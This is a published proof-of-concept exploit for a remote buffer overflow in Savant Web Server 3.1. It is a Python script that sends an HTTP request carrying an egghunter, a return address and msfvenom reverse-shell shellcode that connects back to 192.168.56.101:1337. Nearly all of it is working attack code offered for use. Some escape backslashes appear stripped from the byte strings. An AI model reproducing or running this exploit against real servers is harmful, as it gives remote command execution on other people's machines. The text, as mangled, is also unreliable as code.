Authored by 0xBOF90

Savant Web Server version 3.1 remote buffer overflow exploit with egghunter shellcode.

# Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)
# Date: [30/07/2023]
# Exploit Author: [0xBOF90]
# Vendor Homepage: [link]
# Version: [app version] (3.1)
# Tested on: [Windows 10]

import socket
import sys

try:
 server = b"192.168.56.102"
 #x00x0ax0dx25
 port = 80
 size = 253
 # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337
EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "x00x0ax0dx25"
 buf =  b""
 buf += b"xdbxc0xd9x74x24xf4xbfx57xe2x90xa0x58"
 buf += b"x31xc9xb1x52x31x78x17x83xc0x04x03x2f"
 buf += b"xf1x72x55x33x1dxf0x96xcbxdex95x1fx2e"
 buf += b"xefx95x44x3bx40x26x0ex69x6dxcdx42x99"
 buf += b"xe6xa3x4axaex4fx09xadx81x50x22x8dx80"
 buf += b"xd2x39xc2x62xeaxf1x17x63x2bxefxdax31"
 buf += b"xe4x7bx48xa5x81x36x51x4exd9xd7xd1xb3"
 buf += b"xaaxd6xf0x62xa0x80xd2x85x65xb9x5ax9d"
 buf += b"x6ax84x15x16x58x72xa4xfex90x7bx0bx3f"
 buf += b"x1dx8ex55x78x9ax71x20x70xd8x0cx33x47"
 buf += b"xa2xcaxb6x53x04x98x61xbfxb4x4dxf7x34"
 buf += b"xbax3ax73x12xdfxbdx50x29xdbx36x57xfd"
 buf += b"x6dx0cx7cxd9x36xd6x1dx78x93xb9x22x9a"
 buf += b"x7cx65x87xd1x91x72xbaxb8xfdxb7xf7x42"
 buf += b"xfexdfx80x31xccx40x3bxddx7cx08xe5x1a"
 buf += b"x82x23x51xb4x7dxccxa2x9dxb9x98xf2xb5"
 buf += b"x68xa1x98x45x94x74x0ex15x3ax27xefxc5"
 buf += b"xfax97x87x0fxf5xc8xb8x30xdfx60x52xcb"
 buf += b"x88x4ex0bxebx2dx27x4ex0bxabx8exc7xed"
 buf += b"xd9xe0x81xa6x75x98x8bx3cxe7x65x06x39"
 buf += b"x27xedxa5xbexe6x06xc3xacx9fxe6x9ex8e"
 buf += b"x36xf8x34xa6xd5x6bxd3x36x93x97x4cx61"
 buf += b"xf4x66x85xe7xe8xd1x3fx15xf1x84x78x9d"
 buf += b"x2ex75x86x1cxa2xc1xacx0ex7axc9xe8x7a"
 buf += b"xd2x9cxa6xd4x94x76x09x8ex4ex24xc3x46"
 buf += b"x16x06xd4x10x17x43xa2xfcxa6x3axf3x03"
 buf += b"x06xabxf3x7cx7ax4bxfbx57x3ex6bx1ex7d"
 buf += b"x4bx04x87x14xf6x49x38xc3x35x74xbbxe1"
 buf += b"xc5x83xa3x80xc0xc8x63x79xb9x41x06x7d"
 buf += b"x6ex61x03"

 httpMethod =  b"x31xC9x85xC9x0Fx84x11" + b" /" # xor ecx, ecx; test
ecx, ecx; je 0x17

 egghunter =
 b"x33xd2x66x81xcaxffx0fx33xdbx42x53x53x52x53x53x53"
 egghunter +=
b"x6ax29x58xb3xc0x64xffx13x83xc4x0cx5ax83xc4x08x3c"
 egghunter +=
b"x05x74xdfxb8x77x30x30x74x8bxfaxafx75xdaxafx75xd7"
 egghunter += b"xffxe7"

 inputBuffer =  b"x90"*10+egghunter
 inputBuffer += b"x41" * (size-len(egghunter)-10)
 inputBuffer += b"x74x86x41"#0x00418674
 httpEndRequest = b"rnrn"
 shellcode = b"w00tw00t"+buf
 buf = httpMethod + inputBuffer + httpEndRequest +shellcode
 print("Sending evil buffer...")
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((server, port))
 s.send(buf)
 s.close()

 print("Done!")

except socket.error:
 print("Could not connect!")

RELATED ARTICLESMORE FROM AUTHOR